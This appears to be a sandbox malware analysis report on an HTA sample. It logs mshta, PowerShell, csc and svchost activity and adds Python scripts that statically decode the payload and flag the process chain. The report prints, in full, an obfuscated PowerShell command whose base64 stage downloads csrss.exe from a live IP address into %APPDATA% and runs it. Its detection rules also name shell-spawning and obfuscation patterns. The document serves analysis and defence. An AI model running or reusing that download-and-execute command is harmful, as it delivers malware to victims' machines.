    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: textinputframework.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coreuicomponents.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: wintypes.dll (3 entries)
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dataexchange.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d3d11.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dcomp.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: vbscript.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: version.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: mpr.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: scrrun.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sxs.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: d2d1.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: dwrite.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: edputil.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: windows.staterepositoryps.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: appresolver.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: bcp47langs.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: slc.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: sppc.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Section loaded: onecoreuapcommonproxystub.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 entries)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: ucrtbase_clr0400.dll (2 entries)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: version.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: mscoree.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
    Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: vcruntime140_clr0400.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: ucrtbase_clr0400.dll (2 entries)
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptsp.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: rsaenh.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: cryptbase.dll
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe | Section loaded: kernel.appcore.dll
    Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
    Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
    Source: Binary string: q7C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.pdb source: powershell.exe, 00000003.00000002.1268592235.00000000053C1000.00000004.00000800.00020000.00000000.sdmp
    Source: Binary string: System.Management.Automation.pdb. source: powershell.exe, 00000003.00000002.1275318772.0000000007799000.00000004.00000020.00020000.00000000.sdmp

    Data Obfuscation

    Source: C:\Windows\SysWOW64\mshta.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=='+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a+'FRoMbaSE64StRiNg('+[chAr]0x22+'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'+[chaR]0x22+'))')))"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"
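The command lines above carry two layers of obfuscation. The outer `-c` argument builds a string out of single-quoted fragments and `[char]` casts (`[chaR]0X3a` and `[CHar]58` are both `:`, `[chAr]0x22` is `"`), hands that string to an inner `iex`, and the string itself base64-decodes and executes the real stage. The `DeViCecredENTialDEployMEnT.exe ;` statement in front of `iEx(...)` is a separate command and plays no part in the decoding. The script below is an added example, not code from the Joe Sandbox report or from the sample: it resolves the concatenation statically (no PowerShell is executed), decodes the base64 copied verbatim from the cmd.exe command line above, and pulls the download URL, drop path and imported API out of the result. The regular expressions and the indicator categories are the example's own choices. Because the decoded stage uses `Add-Type -MemberDefinition` to declare a P/Invoke stub for `urlmon!URLDownloadToFile`, Windows PowerShell compiles that stub with csc.exe, which is why the `l1pl2equ.cmdline`, `l1pl2equ.dll` and `l1pl2equ.pdb` entries in this report exist; they are the compiled stub, not a separate payload.

```python
"""Static deobfuscation of the PowerShell stage launched by sdf.hta.

Added example for this report page, not code from the sandbox or the sample.
It never evaluates PowerShell: the 'literal'+[char]N+'literal' expression is
resolved by a tokenizer, and the base64 body is decoded with the standard library.
"""
import base64
import re

# Base64 body copied verbatim from the cmd.exe command line recorded in the report.
PAYLOAD_B64 = (
    "JFBuQUJlcDB6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1FTWJlcmRFZklOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSbE1PTi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1xaHlwVndHVGVvLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKWGdLLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBXb2osdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0ZnV1a1osSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFUdUdOKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ0SlZneEF5S28iICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lc3BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkh0WSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRQbkFCZXAwejo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTkxLjg4LzYyMC9jc3Jzcy5leGUiLCIkZU52OkFQUERBVEFcY3Nyc3MuZXhlIiwwLDApO3N0QVJULXNsZWVQKDMpO0luVm9LZS1pVGVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3Nyc3MuZXhlIg=="
)

# Constructed sample input: the PowerShell command line as the report records it,
# with the payload above spliced back into its single-quoted slot.
CMDLINE = (
    "PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; "
    "iEx($(iex('[sySTem.texT.enCODing]'+[chaR]0X3a+[CHar]58"
    "+'utf8.gETSTRING([SYStem.conVERT]'+[char]58+[cHar]0X3a"
    "+'FRoMbaSE64StRiNg('+[chAr]0x22+'" + PAYLOAD_B64 + "'+[chaR]0x22+'))')))"
)

# One concatenation operand: a single-quoted literal or a [char]N cast, where N
# may be decimal or 0x-prefixed hex in any letter case. The '+' glue is skipped.
OPERAND = re.compile(r"'([^']*)'|\[char\]\s*(0x[0-9a-f]+|\d+)", re.I)
B64_CALL = re.compile(r'frombase64string\(\s*"([A-Za-z0-9+/=]+)"', re.I)


def resolve_concat(expr):
    """Return the string a PowerShell 'lit'+[char]N+... expression evaluates to."""
    out = []
    for literal, number in OPERAND.findall(expr):
        if number:
            value = int(number, 16) if number.lower().startswith("0x") else int(number)
            out.append(chr(value))
        else:
            out.append(literal)
    return "".join(out)


def decode_stage(cmdline):
    """Decode the base64 stage hidden in an iex('..'+[char]..) command line."""
    start = re.search(r"iex\s*\(", cmdline, re.I)
    if start is None:
        raise ValueError("command line has no iex(...) call")
    resolved = resolve_concat(cmdline[start.start():])
    call = B64_CALL.search(resolved)
    if call is None:
        raise ValueError('resolved expression has no FromBase64String("...") call')
    script = base64.b64decode(call.group(1)).decode("utf-8")
    script = re.sub(r"[ \t]{2,}", " ", script)  # the padding runs of spaces carry nothing
    return {
        "resolved": resolved,
        "script": script,
        "urls": re.findall(r"https?://[^\s\"']+", script),
        "drop_paths": re.findall(r"\$env:[a-z_]+\\[^\s\"']+", script, re.I),
        "dll_imports": re.findall(r'DllImport\("([^"]+)"', script, re.I),
        "apis": re.findall(r"extern\s+\w+\s+(\w+)\s*\(", script),
        "sleep_seconds": [int(s) for s in re.findall(r"start-sleep\((\d+)\)", script, re.I)],
    }


if __name__ == "__main__":
    result = decode_stage(CMDLINE)
    print(result["script"])
    for key in ("urls", "drop_paths", "dll_imports", "apis", "sleep_seconds"):
        print(f"{key}: {result[key]}")
```

The two environment-variable references in the decoded stage differ only in case (`$eNv` and `$eNV`), which is why the drop-path pattern is case-insensitive; PowerShell variable names are case-insensitive as well, so both resolve to the same %APPDATA%\csrss.exe. The URL and that path are the two indicators to hunt for in proxy and endpoint telemetry.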
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04BE42D1 push ebx; ret 3_2_04BE42DA
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_04BE3BB5 pushfd ; retf 3_2_04BE3BB9
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe | File created: C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.dll
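The chain recorded in this section, mshta.exe spawning cmd.exe, cmd.exe spawning powershell.exe with mixed-case tokens, and powershell.exe spawning csc.exe on a response file under the user's Temp directory, is worth catching independently of the payload, since the next campaign will swap the base64 but keep the plumbing. The script below is an added example, not code from the report: it replays the three process-creation events as constructed tuples (the base64 payload is elided) and applies three rules to them. The canonical-spelling table, the script-host list and the rule names are the example's own; the case check flags a known PowerShell token only when its casing matches none of the canonical spelling and the all-lower, all-upper and first-letter-capitalised forms, which keeps `-Nop` and `-Ex` quiet while `PowErshELL`, `byPaSS` and `iEx` fire.

```python
"""Rule-based triage of the process chain recorded for sdf.hta.

Added example for this report page, not code from the sandbox. The three
rules correspond to what the process-creation lines above show: an HTA host
spawning a shell, PowerShell invoked with deliberately mixed-case tokens, and
csc.exe compiling a response file from a user's Temp directory.
"""
import re

# Constructed sample: (parent image, child image, child command line) transcribed
# from the report's process-creation lines; the base64 payload is elided as (...).
EVENTS = [
    (r"C:\Windows\SysWOW64\mshta.exe",
     r"C:\Windows\SysWOW64\cmd.exe",
     r'"C:\Windows\system32\cmd.exe" "/c PowErshELL -Ex byPaSS -Nop -w 1 -c '
     r'DeViCecredENTialDEployMEnT.exe ; iEx($(iex(...)))"'),
    (r"C:\Windows\SysWOW64\cmd.exe",
     r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"PowErshELL -Ex byPaSS -Nop -w 1 -c DeViCecredENTialDEployMEnT.exe ; iEx($(iex(...)))"),
    (r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths '
     r'@"C:\Users\user\AppData\Local\Temp\l1pl2equ\l1pl2equ.cmdline"'),
]

# Children an HTA host has no routine reason to launch (example's own list).
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "rundll32.exe", "regsvr32.exe", "mshta.exe"}

# PowerShell tokens with the spelling an operator or script would normally use.
CANONICAL = {
    "powershell": "PowerShell", "-ex": "-Ex", "-ep": "-EP",
    "-executionpolicy": "-ExecutionPolicy", "bypass": "Bypass",
    "-nop": "-NoP", "-noprofile": "-NoProfile", "-w": "-W",
    "-windowstyle": "-WindowStyle", "hidden": "Hidden", "-c": "-C",
    "-command": "-Command", "-enc": "-Enc", "-encodedcommand": "-EncodedCommand",
    "iex": "iex", "invoke-expression": "Invoke-Expression",
}


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def usual_spellings(key, canonical):
    """Casings that do not count as an anomaly for a known token."""
    first_cap = "-" + key[1:2].upper() + key[2:] if key.startswith("-") else key.capitalize()
    return {key, key.upper(), canonical, first_cap}


def case_anomalies(cmdline):
    """Known PowerShell tokens whose casing matches none of the usual spellings."""
    odd = []
    for tok in re.findall(r"[-\w.]+", cmdline):
        canonical = CANONICAL.get(tok.lower())
        if canonical is not None and tok not in usual_spellings(tok.lower(), canonical):
            odd.append(tok)
    return odd


def csc_from_user_temp(cmdline):
    """csc.exe driven by a @response file that lives under a user's Temp directory."""
    m = re.search(r'@"?([^"\s]+\.cmdline)', cmdline, re.I)
    return bool(m and re.search(r"\\AppData\\Local\\Temp\\", m.group(1), re.I))


def triage(events):
    """Apply the rules to (parent, child, cmdline) events; returns (rule, detail) pairs."""
    findings = []
    for parent, child, cmdline in events:
        p, c = image_name(parent), image_name(child)
        if p == "mshta.exe" and c in SCRIPT_HOSTS:
            findings.append(("mshta_child", f"{p} -> {c}"))
        if c in ("cmd.exe", "powershell.exe", "pwsh.exe"):
            odd = case_anomalies(cmdline)
            if odd:
                findings.append(("powershell_case_anomaly", ", ".join(odd)))
        if c == "csc.exe" and csc_from_user_temp(cmdline):
            findings.append(("csc_from_user_temp", f"{p} -> {c}"))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(EVENTS):
        print(f"{rule:26} {detail}")
```

The case rule fires twice here because the cmd.exe command line already contains the PowerShell invocation verbatim; when correlating on a real process tree, deduplicate on the PowerShell child so one launch counts once. Add-Type compiles through csc.exe from %TEMP% in legitimate administrative scripts too, so the csc rule is a strong signal only in combination with the mshta parent.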

    Hooking and other Techniques for Hiding and Protection

    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 entries)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 entries)
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
